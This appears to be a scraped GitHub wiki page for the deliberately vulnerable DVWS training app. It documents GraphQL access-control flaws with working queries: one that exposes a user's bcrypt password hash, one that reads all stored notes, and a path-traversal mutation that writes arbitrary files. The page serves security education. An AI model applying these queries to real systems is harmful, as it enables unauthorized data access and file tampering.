GraphQL Access Control Issues

Introduction

Access Control issues can exist in Graphql

Technical Details

The following query can be used to search for users that exist in DVWS


  query {
  userSearchByUsername(username: "test")
  {
    id,
username,
    password,
    admin,
    token
    
  }
  
  
}

which returns that following information. The password of this user cannot be retrieved.

{
  "data": {
    "userSearchByUsername": [
      {
        "id": "61ba33fda2b09f19c069363e",
        "username": "test",
        "password": null,
        "admin": false,
        "token": null
      }
    ]
  }
}

However the userFindbyId query can be used to find the password hash on this user

  query {
  userFindbyId(id: "61b8cca93b6b6435e8d2c972")
  {
username,
password,
admin
    
  }

Response:

{
  "data": {
    "userFindbyId": {
      "username": "test",
      "password": "$2b$10$ZdP85I0w91KePs9FoGVr1O9wq1SthzQNSYXGjufAPw6aGN/qvaHuS",
      "admin": false
    }
  }
}

Any authenticated user can use the readNote query to read all notes stored within DVWS

query {
	readNote(name:"test"){
		id,
    name,
    body,
    created_date,
    user,
    type,
    no
  
  
}
}

updateUserUploadFile mutation query designed for administrators of DVWS can be used by any authenticated user to create arbitrary files on the system.

https://github.com/snoopysecurity/dvws-node/wiki/GraphQL-Arbitrary-File-Write

  mutation {
  updateUserUploadFile(filePath: "../../../../../../tmp/test.txt",fileContent:"foo")
  {
		filePath,
    fileContent
  }
  
  
}

Solutions

FAQ

Questions

GraphQL Access Control Issues

Introduction

Technical Details

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Solutions

FAQ

Clone this wiki locally